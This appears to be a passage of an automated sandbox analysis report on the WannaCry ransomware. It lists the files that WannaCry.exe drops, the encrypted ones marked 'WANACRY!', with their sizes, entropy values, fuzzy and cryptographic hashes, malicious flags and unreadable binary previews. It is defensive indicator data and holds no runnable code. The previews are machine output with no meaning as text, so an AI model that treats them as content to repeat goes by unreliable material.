                                                                              SHA-256:89151EAB430B2FA4B726B9EDF19DECA7975320370FC3445781E9D9B8731BF7A7
                                                                              SHA-512:64774009453E15600ABEA9C0BFECAF97C2A51C85D0013276D75C6BE2990734BEBB39CB6E7AD2DF862845B2F456BA44C7E2DA9F7E8AD9D09BE62C91B1BF320319
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....X............v...W...2F*3.;$..T.\x{.,.....F)..*.O.E...'.t_...;x ~?..bXu....L.$...`..^..........H..a.b.....=.^q......M.&E..#$.....-.q..O.XU .y..0..,Y.@...@f..p. F.h..Bg..|.._;.g0.?..o.....C%...`.p@./R..\.|.H.O...xr..ZFi.q....V.A....S'I.~._N.lk.............*..I]......y..:....Z.a....*0.I.KW<...<?G..l..<.8R.E..I...5..5..%........yc..G...j..p..i.K7..Gy..o...G.<...'.....o..n..F...CN.....z$.d....G.Wyu.E..U9...b..?.)A....U....[.l.`../{.rg#.@..<.....G....`..2..Z....\n2...;cI.W4)...ld..&.M..d.;..Y...N.....(.7.?..8...m_6.=.5..~....<.K.........2v.....;(g..8L.....6[J..@d.P.R4^.......i.e]..Ox]D....O.*..Y...J...%8..H...t.p..A...+...d..<.......<....4{VF-._.9........w.a.^t....._2.s./..dd.....o.'.kXQ"...M}.J.X.h..A[..c..uA...^...R....U(......l.......Q.<'....^.oi.5....t.y..*.xC.F $.2I....3.~...z...r.M.k.>Z<.j!o.6.$C-..M.].........Na.N.....@o R.3..$..0._...."\R.R8.6.`..8...I^5E.<.Q.A..]J.Y.......e.6......b...........u.!....nv0K<.o...F.....W..A.=.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80488
                                                                              Entropy (8bit):7.997904454480667
                                                                              Encrypted:true
                                                                              SSDEEP:1536:ZWQi2Xvqz/gjeFQ4Db1vY3HU9Dq3ti/4EkrXuuycwU5LNEQvNhyujFBh:AQfXvkgj6BbJY3H8q3Y/4EkrXIUXEQvz
                                                                              MD5:3561BC0FC3555157531CE334CB7F13DC
                                                                              SHA1:02FB97CE39987BC9132EB79094349798B5075C7E
                                                                              SHA-256:9E24A035D0002D7D309B647842148D054B65FAB0C647984B2C8DB19A0952C6B8
                                                                              SHA-512:04A1FAB14C519388A9E6FACD163F19FB9F0018F9C730BB81BA71FA7DA68DDBADCEFD9F738DF92CC190AC23841C9A0D5DF2BEB06C03B86DE6FF213F10D69C157D
                                                                              Malicious:true
                                                                              Preview:WANACRY!......%Zz>...Oo..0..!..7X.k.O.i..u.Z...".4hC..T...."l..DB.y.$.....6.l[.7...@...._.C..S.YR]O2.....r..7......;V.!*)z...c..E.......d=...X.....F.....b....2.N.=.c....9.T&........ff..=...-o_f..b{E6j..o+........*.....!..*..*.U..7....R.rv~!. k-/..p>a..l.....D9..........7.@1."?...........y..g..G.......c.x.0Z.Qq.....2...J.6H.%.(.".#/...p..s..~...9..SdF|6..}..8..Z..jfrU...}"..xo........b...j.......c".o...f....N8n....?2...U_vJ6....N+.....F._/S.A.V.,fC...%....]S.6,.H..L.K..7.......P.....>...f.j.-Lz.wB........8.h.EM....$../.>v..L}..._{...{iY.V.3i@....].j..7..-HdE.P.T`jv.Q.....{....o.+.'..p.....xO..^:...-...P.3...v...'P.$.wx..tOE^.,....y.JS<-..}(hu..z.-3^]........Iw.J#.:.I(no.O..L..P..v.......=........."....{.d..|u..7...,Y..x.s..T....Z..,I...:..+....dL-.-.%|.K.4.sE.O@..6..Y.@.....Z..../.....?.E'.J.......,.I.k9'.Q..+K.9.J..'.@.7}2Km./.J.z.j..X..t3..tel0.'.lK.z............(xDP^.(...RU.z..u.Of.Z..W..dI.hv..9u^a~\`>..%...+W.7.w2cO....?..../%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80488
                                                                              Entropy (8bit):7.997904454480667
                                                                              Encrypted:true
                                                                              SSDEEP:1536:ZWQi2Xvqz/gjeFQ4Db1vY3HU9Dq3ti/4EkrXuuycwU5LNEQvNhyujFBh:AQfXvkgj6BbJY3H8q3Y/4EkrXIUXEQvz
                                                                              MD5:3561BC0FC3555157531CE334CB7F13DC
                                                                              SHA1:02FB97CE39987BC9132EB79094349798B5075C7E
                                                                              SHA-256:9E24A035D0002D7D309B647842148D054B65FAB0C647984B2C8DB19A0952C6B8
                                                                              SHA-512:04A1FAB14C519388A9E6FACD163F19FB9F0018F9C730BB81BA71FA7DA68DDBADCEFD9F738DF92CC190AC23841C9A0D5DF2BEB06C03B86DE6FF213F10D69C157D
                                                                              Malicious:true
                                                                              Preview:WANACRY!......%Zz>...Oo..0..!..7X.k.O.i..u.Z...".4hC..T...."l..DB.y.$.....6.l[.7...@...._.C..S.YR]O2.....r..7......;V.!*)z...c..E.......d=...X.....F.....b....2.N.=.c....9.T&........ff..=...-o_f..b{E6j..o+........*.....!..*..*.U..7....R.rv~!. k-/..p>a..l.....D9..........7.@1."?...........y..g..G.......c.x.0Z.Qq.....2...J.6H.%.(.".#/...p..s..~...9..SdF|6..}..8..Z..jfrU...}"..xo........b...j.......c".o...f....N8n....?2...U_vJ6....N+.....F._/S.A.V.,fC...%....]S.6,.H..L.K..7.......P.....>...f.j.-Lz.wB........8.h.EM....$../.>v..L}..._{...{iY.V.3i@....].j..7..-HdE.P.T`jv.Q.....{....o.+.'..p.....xO..^:...-...P.3...v...'P.$.wx..tOE^.,....y.JS<-..}(hu..z.-3^]........Iw.J#.:.I(no.O..L..P..v.......=........."....{.d..|u..7...,Y..x.s..T....Z..,I...:..+....dL-.-.%|.K.4.sE.O@..6..Y.@.....Z..../.....?.E'.J.......,.I.k9'.Q..+K.9.J..'.@.7}2Km./.J.z.j..X..t3..tel0.'.lK.z............(xDP^.(...RU.z..u.Of.Z..W..dI.hv..9u^a~\`>..%...+W.7.w2cO....?..../%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11848
                                                                              Entropy (8bit):7.9851777139855145
                                                                              Encrypted:false
                                                                              SSDEEP:192:13UcfnB43MetcHoUB1/HqiJS1fd2WZ+oxN96OTvMH0P2zyiubCC/W42W:1EcfnB0yHBk1fd2WZ+U6O7MH0P2Gi6CI
                                                                              MD5:0065FAF1DFF27F538133BB768AE34C85
                                                                              SHA1:009500B79A4600FFCC4353AB9602991680EBD9C5
                                                                              SHA-256:DE4C897ED4B9D05E454FA1F653370C8DFFEA3B5DB277892DF779F3FF55219EB2
                                                                              SHA-512:F376A81C9E88AD168834FD2C763D26CC3DE8FD659C66F3A03F1836E615DB5C3A75F4632EE92B5747B824B1A782B1067C402736B89D2E69D24A6E26092E79D099
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O..=.0...S..m.d.k.../.p(]....?..9.E.)..C..G%...&|.0.PQ..f.M.2.a..Uh.Q.>AD.@..y:.X[.....`VjA.......`:...f.J'..k.Z.MVII.....$q......s..U.;R<.'8. ffT.@..*....N-5.v.z...j9F..QM...x..... .'L8...K...@.....!.O...#....R..C.....Wc..o.A....Qk........./-........pL+.[..`.)MJ...@p........;.....MMz..=|...Q.m....N.....~g.`.oF..b`\....7.4..p..V...8....%W."..M3N......=C.0d.j...o.)J.S..t.p./.......*...0...:......%............S...d...a......6.l...{n.Y....|$...vC.B...h.X....R.*~..:3..`....X...97....b.t.F...E.......[.@...... .l.!Ze<...g..n..{#......h......B.%.fxD.u0.,\.+P...Y.e8.......:+......9g.A..N.}.]m.y..</\-^.0"..R.....n..2....Ae..h./@...A.Cn...rn.......W...!3Q.....XRt.q...6.>.3%.E#s4.V..8...N?if..v.{|i ..+-.(..lr)o.....).C{...B.u.6.Q.p~...4..b.2a.(h(.vzgI...0n........t:..>x.b.}.{Q...M.fxA)..F/<.?.....NV~Q..n%.%....`n&.|....[~>.c.......YS..4.+..]E....jl$2.ZS.....5V....GU...vx6...=.d..R.6YP..Y..I@.8u;.].q........d....`..6.e.w..e
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11848
                                                                              Entropy (8bit):7.9851777139855145
                                                                              Encrypted:false
                                                                              SSDEEP:192:13UcfnB43MetcHoUB1/HqiJS1fd2WZ+oxN96OTvMH0P2zyiubCC/W42W:1EcfnB0yHBk1fd2WZ+U6O7MH0P2Gi6CI
                                                                              MD5:0065FAF1DFF27F538133BB768AE34C85
                                                                              SHA1:009500B79A4600FFCC4353AB9602991680EBD9C5
                                                                              SHA-256:DE4C897ED4B9D05E454FA1F653370C8DFFEA3B5DB277892DF779F3FF55219EB2
                                                                              SHA-512:F376A81C9E88AD168834FD2C763D26CC3DE8FD659C66F3A03F1836E615DB5C3A75F4632EE92B5747B824B1A782B1067C402736B89D2E69D24A6E26092E79D099
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O..=.0...S..m.d.k.../.p(]....?..9.E.)..C..G%...&|.0.PQ..f.M.2.a..Uh.Q.>AD.@..y:.X[.....`VjA.......`:...f.J'..k.Z.MVII.....$q......s..U.;R<.'8. ffT.@..*....N-5.v.z...j9F..QM...x..... .'L8...K...@.....!.O...#....R..C.....Wc..o.A....Qk........./-........pL+.[..`.)MJ...@p........;.....MMz..=|...Q.m....N.....~g.`.oF..b`\....7.4..p..V...8....%W."..M3N......=C.0d.j...o.)J.S..t.p./.......*...0...:......%............S...d...a......6.l...{n.Y....|$...vC.B...h.X....R.*~..:3..`....X...97....b.t.F...E.......[.@...... .l.!Ze<...g..n..{#......h......B.%.fxD.u0.,\.+P...Y.e8.......:+......9g.A..N.}.]m.y..</\-^.0"..R.....n..2....Ae..h./@...A.Cn...rn.......W...!3Q.....XRt.q...6.>.3%.E#s4.V..8...N?if..v.{|i ..+-.(..lr)o.....).C{...B.u.6.Q.p~...4..b.2a.(h(.vzgI...0n........t:..>x.b.}.{Q...M.fxA)..F/<.?.....NV~Q..n%.%....`n&.|....[~>.c.......YS..4.+..]E....jl$2.ZS.....5V....GU...vx6...=.d..R.6YP..Y..I@.8u;.].q........d....`..6.e.w..e
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1179240
                                                                              Entropy (8bit):7.99985055087553
                                                                              Encrypted:true
                                                                              SSDEEP:24576:80/+fe4dBJHldZ7zcaLiQnPyfOOj1e3wb3uc04HqNH54H3a7:+fDv54oiQPyFZYiucfqNiq7
                                                                              MD5:D35DAF8F04C317F5FA05AC3C8471929C
                                                                              SHA1:D044AC0AAD62FC59299576C736D60F1520EA4B9D
                                                                              SHA-256:76846DD054E3A0B0FFA409A1E28E88DC81ABB0F4B2BD3E118FEFC7CBCA3BD987
                                                                              SHA-512:26BB1EAFF2092C4FD976CE5D67B83FD7DD041AA82FF48C9E9618611CE8C1BD90197E1F2668CC4AA41DD8EE0ED4C2525D8A75D1BAD631A86025BEC9AE87501C5F
                                                                              Malicious:true
                                                                              Preview:WANACRY!....#....q.x..HW.@68.....]..N..m..w....>...8.C.B..#... ..}...?.&*.x..&x\rM7.$..9.C.x.-Y......f#...:.~.....G...W.*D>.\{A.B.G8.....nP.\R...`...C......x.........."..<.h...9O..|.s..$.i<u..#......k.S.$.c..t.Vu..`..]...0.1.Q...6=.3I......)g..vb...5.....D.......q......V.t*..+r..7K._ S..#B....L...^CE..+mav.T.....X.....A.W.m...|..x.[v..~.........oK;Q.H{`R.q..#y.....8.9..d.. ...+......8.{.:\<.....5...u.c....E.A"6.o".."..J.$..Z.m.a.` ..%.#x..q...~...>5"..U...d..O..A-..-~9_.t!.;...%ho\...m.....m..n.H..%...........>..9CLz.h..-N.........5&8.N.Dt.e...o....n.Om.q......k...<...jE....1+...Sh..HS..H.]+z.z\......B.l.S...%.:..x,5.8..P.nxv...oh.5H...r~C0$.G..I...l.....J1..fWP..}........I.......6..9....7.E.../.....T.....R..5="..b...{o.MC-...TSE.].8o..[&-BE..L=D...P%..*..Y....g...>E.+zMG)Wh-...C...g......m.%.......i....Yb.....S.......'......R...U......~nk...#...~..6_.f...7....w.6.....32.. {&.k...C..}h.M..ej.)a*e.7.B...*A9u6..f....'/#Vb..`.w7+......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1179240
                                                                              Entropy (8bit):7.99985055087553
                                                                              Encrypted:true
                                                                              SSDEEP:24576:80/+fe4dBJHldZ7zcaLiQnPyfOOj1e3wb3uc04HqNH54H3a7:+fDv54oiQPyFZYiucfqNiq7
                                                                              MD5:D35DAF8F04C317F5FA05AC3C8471929C
                                                                              SHA1:D044AC0AAD62FC59299576C736D60F1520EA4B9D
                                                                              SHA-256:76846DD054E3A0B0FFA409A1E28E88DC81ABB0F4B2BD3E118FEFC7CBCA3BD987
                                                                              SHA-512:26BB1EAFF2092C4FD976CE5D67B83FD7DD041AA82FF48C9E9618611CE8C1BD90197E1F2668CC4AA41DD8EE0ED4C2525D8A75D1BAD631A86025BEC9AE87501C5F
                                                                              Malicious:true
                                                                              Preview:WANACRY!....#....q.x..HW.@68.....]..N..m..w....>...8.C.B..#... ..}...?.&*.x..&x\rM7.$..9.C.x.-Y......f#...:.~.....G...W.*D>.\{A.B.G8.....nP.\R...`...C......x.........."..<.h...9O..|.s..$.i<u..#......k.S.$.c..t.Vu..`..]...0.1.Q...6=.3I......)g..vb...5.....D.......q......V.t*..+r..7K._ S..#B....L...^CE..+mav.T.....X.....A.W.m...|..x.[v..~.........oK;Q.H{`R.q..#y.....8.9..d.. ...+......8.{.:\<.....5...u.c....E.A"6.o".."..J.$..Z.m.a.` ..%.#x..q...~...>5"..U...d..O..A-..-~9_.t!.;...%ho\...m.....m..n.H..%...........>..9CLz.h..-N.........5&8.N.Dt.e...o....n.Om.q......k...<...jE....1+...Sh..HS..H.]+z.z\......B.l.S...%.:..x,5.8..P.nxv...oh.5H...r~C0$.G..I...l.....J1..fWP..}........I.......6..9....7.E.../.....T.....R..5="..b...{o.MC-...TSE.].8o..[&-BE..L=D...P%..*..Y....g...>E.+zMG)Wh-...C...g......m.%.......i....Yb.....S.......'......R...U......~nk...#...~..6_.f...7....w.6.....32.. {&.k...C..}h.M..ej.)a*e.7.B...*A9u6..f....'/#Vb..`.w7+......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1010680
                                                                              Entropy (8bit):7.999815926822188
                                                                              Encrypted:true
                                                                              SSDEEP:24576:NdD2BDZapMif4GblxvMUqROeX9R/gcfyypbU40VF0YEDf8D9G+DClh3i9VdP:Nd6BD2XfJxojtpxbU4oWpDfk1DSyJ
                                                                              MD5:1B86D14A9763635F096EA50C0970C9AC
                                                                              SHA1:8486F727883773A43B27C50D9B45470102A411DC
                                                                              SHA-256:1A0A5CEA84F9396AA65281E39D4FB5ACD32A911E457AE96EDAE49F4366FA419B
                                                                              SHA-512:B987F50A76AEAA97CE59EDEF2C72F7ED5D3D7970AE7F128D464AC31F465CBB4352803262AAB72B9387DF5B924B7E801EDF2BEDFDC8D15C056E3BE986485A490E
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........tS...N#./.X..X.=...e.....=..Ze.....cADe..S..Wa..5(..5...,........o\...U .Q7.R.E.]..H....................Z.r`l$.jgJHRg...........E..:..".V..2uqTU.h.M.:.h.....7O.p.F...&z.~....)t.d..U.j0........=*x...{....3.......H. ..M.D..x\.]..z..@R.....j.......v381....~....%h.....m.8._.....$..*....y&+:...9.{.br.?......D.L8GMF......{...^..f..V.}Xm.^......RA...#X..|.w6;....R../.]..We..+..r...&g({-lc.......E.`e.b...\.4.4.G.=.q2...m.VFw.,,.d.#p..v..haB..^`...Pu...s.bn.YKh^u.l..j.n?..l.~.O[.K.z....dC.....?......a......b..tm.....ou2.%.......|....r..w....>(y..(.6....Y..W..?.6.a.^.+...q.a./y.s7.p$a".....v`.'.....a#...bp8b[b...6.t...........;........+.J..s...Q.'.dr.Ok...:.$q.. .P..C..n......k9+vN...M-O%D.1..E..O..r.N3....5..............M..@O(....C.k.x._.8z.......dU.U?J...,)n..Y.....k.....o.......D.u.g.p2arGO....q.+....o.....i..../>.U..}d.0.....o.^.7!...-......>...j..H....5...<4..Q .t.N.[./qp...*.O..3......L....k!...Z.g..6>....P.....ib..4...WhOm,.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1010680
                                                                              Entropy (8bit):7.999815926822188
                                                                              Encrypted:true
                                                                              SSDEEP:24576:NdD2BDZapMif4GblxvMUqROeX9R/gcfyypbU40VF0YEDf8D9G+DClh3i9VdP:Nd6BD2XfJxojtpxbU4oWpDfk1DSyJ
                                                                              MD5:1B86D14A9763635F096EA50C0970C9AC
                                                                              SHA1:8486F727883773A43B27C50D9B45470102A411DC
                                                                              SHA-256:1A0A5CEA84F9396AA65281E39D4FB5ACD32A911E457AE96EDAE49F4366FA419B
                                                                              SHA-512:B987F50A76AEAA97CE59EDEF2C72F7ED5D3D7970AE7F128D464AC31F465CBB4352803262AAB72B9387DF5B924B7E801EDF2BEDFDC8D15C056E3BE986485A490E
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........tS...N#./.X..X.=...e.....=..Ze.....cADe..S..Wa..5(..5...,........o\...U .Q7.R.E.]..H....................Z.r`l$.jgJHRg...........E..:..".V..2uqTU.h.M.:.h.....7O.p.F...&z.~....)t.d..U.j0........=*x...{....3.......H. ..M.D..x\.]..z..@R.....j.......v381....~....%h.....m.8._.....$..*....y&+:...9.{.br.?......D.L8GMF......{...^..f..V.}Xm.^......RA...#X..|.w6;....R../.]..We..+..r...&g({-lc.......E.`e.b...\.4.4.G.=.q2...m.VFw.,,.d.#p..v..haB..^`...Pu...s.bn.YKh^u.l..j.n?..l.~.O[.K.z....dC.....?......a......b..tm.....ou2.%.......|....r..w....>(y..(.6....Y..W..?.6.a.^.+...q.a./y.s7.p$a".....v`.'.....a#...bp8b[b...6.t...........;........+.J..s...Q.'.dr.Ok...:.$q.. .P..C..n......k9+vN...M-O%D.1..E..O..r.N3....5..............M..@O(....C.k.x._.8z.......dU.U?J...,)n..Y.....k.....o.......D.u.g.p2arGO....q.+....o.....i..../>.U..}d.0.....o.^.7!...-......>...j..H....5...<4..Q .t.N.[./qp...*.O..3......L....k!...Z.g..6>....P.....ib..4...WhOm,.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1042184
                                                                              Entropy (8bit):7.99981704651951
                                                                              Encrypted:true
                                                                              SSDEEP:24576:yLVDG7UsX5f0Aww7ii762qHJk1k9UyHNeVPV9oh55jYSe:YhG7tpfawGi762qHJkPgNQ855jYSe
                                                                              MD5:BA78859079AE384157313F376BF155C4
                                                                              SHA1:574668A6E3B3D543BE534897BCE1BA02DBDDED3E
                                                                              SHA-256:74346E84488350921AD0651BB0C2F82091BE931F4C17692474CDD476600F05DF
                                                                              SHA-512:13F503941DEA838CFA9B5CB81930D4D5215A4B08B8F25B59DC36B58D91EFAF11EDD65E210138AE36D0DD9D33B9E598458FCD38367E821F3856C296B101C29633
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......Zf....MJB{\g..)....t.D6...+O.~.fC|(..|)...._.O[.!l...1........*....[!).K.x.Z5.l..x....-\3..K.i.3..w..9.J.k.H...g..h.....c..V..>oR..}.S..+..fj..A.........r..NX.C`.n.-\.....21f..7OE..!..E..._.B_.`.CX.w....s....<aG....Z.x8.?h.I-].W\N.9%q..R.0..;.............$.O9:....j...oe.#.h!h..Al.5dP..x.<b.k."-..s.K.<..ov..m.!......Hd.R^......m...i........>Hq..o..A.wi.p.u...{...J....F.gUg..d..Xp.Q....sh.?.~.77#.......).2..Gu....h5.5t.yw...U56....F.x...*B#.c.|..a.L......cV...h......).R.`.[....y.{..K?.O,......-.Z.J.WG..P..Y...D....z.7...0..2.S..b.v...|R...|...]s.jJE...P..6..L.;.}.G...p~..0....g'.YT....)..F.A...e..f.....{.e..0.Dp.?..J.....P..a.N......A...?.W..72D.2f...W.U..{.9....z.....r.....O:...j.....b.zo.5...S9@..wU....@D....s..O..w.MFb.O9.......q.d.....@.2...7...-..=0...O,.p...oA(...y.E.....g...h...b..bs..%..Uj4...Izt.....;#\.[...i.1..../....5;...1.......O.D.R..f....o.....p|G:._+.5.j5..:..I.)....._....I.,3?.x......_Ew.b.......Ptm.w@.m.[..[o
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1042184
                                                                              Entropy (8bit):7.99981704651951
                                                                              Encrypted:true
                                                                              SSDEEP:24576:yLVDG7UsX5f0Aww7ii762qHJk1k9UyHNeVPV9oh55jYSe:YhG7tpfawGi762qHJkPgNQ855jYSe
                                                                              MD5:BA78859079AE384157313F376BF155C4
                                                                              SHA1:574668A6E3B3D543BE534897BCE1BA02DBDDED3E
                                                                              SHA-256:74346E84488350921AD0651BB0C2F82091BE931F4C17692474CDD476600F05DF
                                                                              SHA-512:13F503941DEA838CFA9B5CB81930D4D5215A4B08B8F25B59DC36B58D91EFAF11EDD65E210138AE36D0DD9D33B9E598458FCD38367E821F3856C296B101C29633
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......Zf....MJB{\g..)....t.D6...+O.~.fC|(..|)...._.O[.!l...1........*....[!).K.x.Z5.l..x....-\3..K.i.3..w..9.J.k.H...g..h.....c..V..>oR..}.S..+..fj..A.........r..NX.C`.n.-\.....21f..7OE..!..E..._.B_.`.CX.w....s....<aG....Z.x8.?h.I-].W\N.9%q..R.0..;.............$.O9:....j...oe.#.h!h..Al.5dP..x.<b.k."-..s.K.<..ov..m.!......Hd.R^......m...i........>Hq..o..A.wi.p.u...{...J....F.gUg..d..Xp.Q....sh.?.~.77#.......).2..Gu....h5.5t.yw...U56....F.x...*B#.c.|..a.L......cV...h......).R.`.[....y.{..K?.O,......-.Z.J.WG..P..Y...D....z.7...0..2.S..b.v...|R...|...]s.jJE...P..6..L.;.}.G...p~..0....g'.YT....)..F.A...e..f.....{.e..0.Dp.?..J.....P..a.N......A...?.W..72D.2f...W.U..{.9....z.....r.....O:...j.....b.zo.5...S9@..wU....@D....s..O..w.MFb.O9.......q.d.....@.2...7...-..=0...O,.p...oA(...y.E.....g...h...b..bs..%..Uj4...Izt.....;#\.[...i.1..../....5;...1.......O.D.R..f....o.....p|G:._+.5.j5..:..I.)....._....I.,3?.x......_Ew.b.......Ptm.w@.m.[..[o
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1681000
                                                                              Entropy (8bit):7.9998906579908065
                                                                              Encrypted:true
                                                                              SSDEEP:24576:FC95nwG4L8cW9u50QJlovK1zwuT2LHx6eYSRhcN9K9lyBx3HTNpp4ikP1:iO8TsCvK1zwuTKzJOs9c3zeF1
                                                                              MD5:CB377F6773B13F2F80FA58C71FC6B101
                                                                              SHA1:98E65C6EE180AA25A4797ACFB1B31172762C5943
                                                                              SHA-256:605D8D51560CE013335B1F1BC57FD89C927A8C31116D46A5852C59C483F6113B
                                                                              SHA-512:B44BA2BAAB1EA6F5AEA6FFC5D74391664D3D0CA91C9611F86F78664CDFA332EC2E496EC42C7102D15ACEF38A339BBB8779B4FC9876B0EC84DD4DC42B66136E61
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....#..f.......U_...!Z...X..1-..t...[..O.T.c.. ..M@.L...L............/..Q....%......{..N..6...g...D..SMXh].E..!5..LKO^R60......^c..;....2X;i....3..@.F......l.b.....q.C N.R ..\7...M..!...._.........--......[.!aB...?..,.w......<$.N...hs%.U=..1....K...........V.........a.u.=}..4.F.C].y.(~t=H....y.....@.D.....2.%~.&.l....xc.8.R...&.<$.zx....}......g..T.....yZ..$C.t4.....5.*.H.&......qM....0%.~t..-.Q.......~.p...ER6.c..6H.....Piyz>c+R.b.`...%.LJ*.F`....-...~...e..}..]c.k.#C.y..o..$'BY3..k...t.....".s.......=.j$a..~.|.j*..+...f..}...Q.9.Gl.gS..*..*.hcKj.gd..R.F....|&....O.....%SV.^.(= ........T.BM.am.5.....|/dK.H.g;....s/..Ww.......9n.$=...Qb4-}.P...}.0..oEN...^.n.k.n.]|30.'$.zUQ....K...?..A....\...l....A......P@.%n..:W....1.B.>..V.r......r....A(@.2..e/,6...a.D8...X.0..X..:R+............i7.%...>.....9.....6g..T..a....og.......o...R.i....j...Li...Hr...b-wm.&..:5.../`g..h>.f.............._.ii1.mSi+><".i...N.O....0..ur..p....9JQ1.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1681000
                                                                              Entropy (8bit):7.9998906579908065
                                                                              Encrypted:true
                                                                              SSDEEP:24576:FC95nwG4L8cW9u50QJlovK1zwuT2LHx6eYSRhcN9K9lyBx3HTNpp4ikP1:iO8TsCvK1zwuTKzJOs9c3zeF1
                                                                              MD5:CB377F6773B13F2F80FA58C71FC6B101
                                                                              SHA1:98E65C6EE180AA25A4797ACFB1B31172762C5943
                                                                              SHA-256:605D8D51560CE013335B1F1BC57FD89C927A8C31116D46A5852C59C483F6113B
                                                                              SHA-512:B44BA2BAAB1EA6F5AEA6FFC5D74391664D3D0CA91C9611F86F78664CDFA332EC2E496EC42C7102D15ACEF38A339BBB8779B4FC9876B0EC84DD4DC42B66136E61
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....#..f.......U_...!Z...X..1-..t...[..O.T.c.. ..M@.L...L............/..Q....%......{..N..6...g...D..SMXh].E..!5..LKO^R60......^c..;....2X;i....3..@.F......l.b.....q.C N.R ..\7...M..!...._.........--......[.!aB...?..,.w......<$.N...hs%.U=..1....K...........V.........a.u.=}..4.F.C].y.(~t=H....y.....@.D.....2.%~.&.l....xc.8.R...&.<$.zx....}......g..T.....yZ..$C.t4.....5.*.H.&......qM....0%.~t..-.Q.......~.p...ER6.c..6H.....Piyz>c+R.b.`...%.LJ*.F`....-...~...e..}..]c.k.#C.y..o..$'BY3..k...t.....".s.......=.j$a..~.|.j*..+...f..}...Q.9.Gl.gS..*..*.hcKj.gd..R.F....|&....O.....%SV.^.(= ........T.BM.am.5.....|/dK.H.g;....s/..Ww.......9n.$=...Qb4-}.P...}.0..oEN...^.n.k.n.]|30.'$.zUQ....K...?..A....\...l....A......P@.%n..:W....1.B.>..V.r......r....A(@.2..e/,6...a.D8...X.0..X..:R+............i7.%...>.....9.....6g..T..a....og.......o...R.i....j...Li...Hr...b-wm.&..:5.../`g..h>.f.............._.ii1.mSi+><".i...N.O....0..ur..p....9JQ1.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80072
                                                                              Entropy (8bit):7.997702823251578
                                                                              Encrypted:true
                                                                              SSDEEP:1536:kMAURE252AcIAYeHyAWZ6pcaXupp1kfhF3LkE4BzQs2:uUxfynHyABpk9AhF7kE4Bcr
                                                                              MD5:04330BBC3958EDC9DB6CEC11301B30F2
                                                                              SHA1:3B822E427D5C891B5C0FD3916CC1F6F3990A2AAC
                                                                              SHA-256:4D2787DA40394432594AC74CE7D4E35519C67343DE172A90F7F3BD0F2A9A09A5
                                                                              SHA-512:C34043AD8379714609C838A44EB2E5DE44BFA5EB401CBE93ACFED90FDE1F0D552763EDABB968E4F39C875E5A907CC4C18D3F354CDD592B0AF83959EEA666A3D5
                                                                              Malicious:true
                                                                              Preview:WANACRY!....R.P.g...(.Y.`.p.....j'"..@$w...':%.1V...1.....~..^.Q#'.t..4..Tq....f.Q........2..&...HC....<.]..{.o..s.e...urp-..s..|X..Z.w.B.4..8..^N....,.N..5...+....>...6\. -N.K.mt..bn.y._......6.`#G.u..LKH....J.....:K?5._@../..*.M..*..s4.........7.Y?........7...........SQs.`@..7..}7~.G..6D.R[.......}.].f..e......I..IgEvJiF..ZU.{..C.>....B......V7...4&....F4......e......x....}...f..X@.q.0@.p.-.*..1...iP*K..).qu..>...i...[.g.u.@O...W...H._[q*"...1@..3v......\..`8...M.F[..jrc....G.p.....7.G`..K.le...!.5..7...9...}.5....w..w....-.....0...........$.cf..k..v5...!.;.[_....w9D.'@('.N..t..&]6E.>.R..A...|..VX..T.:.D...\........; .A.d[b-..N....O.....c....F43x...../..j.....f..hp...'F..?.['.....o...C%.~..FFG(.[.H..\D..._...CZ..?..f..B@vp.{.xg.:....;C....TZ..`..U-........w..AiTC^....6..Wi.........0.....Ms.,T.......t .7$t[Z0........PC.]_....t...L.O.`..?E...t..-..(....x..A...A.."#.Bt.f4.>../pK.4.7..OMy. ..Lu.*,y4`}SNTv.{...An?.y...>l...&..)."..L...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80072
                                                                              Entropy (8bit):7.997702823251578
                                                                              Encrypted:true
                                                                              SSDEEP:1536:kMAURE252AcIAYeHyAWZ6pcaXupp1kfhF3LkE4BzQs2:uUxfynHyABpk9AhF7kE4Bcr
                                                                              MD5:04330BBC3958EDC9DB6CEC11301B30F2
                                                                              SHA1:3B822E427D5C891B5C0FD3916CC1F6F3990A2AAC
                                                                              SHA-256:4D2787DA40394432594AC74CE7D4E35519C67343DE172A90F7F3BD0F2A9A09A5
                                                                              SHA-512:C34043AD8379714609C838A44EB2E5DE44BFA5EB401CBE93ACFED90FDE1F0D552763EDABB968E4F39C875E5A907CC4C18D3F354CDD592B0AF83959EEA666A3D5
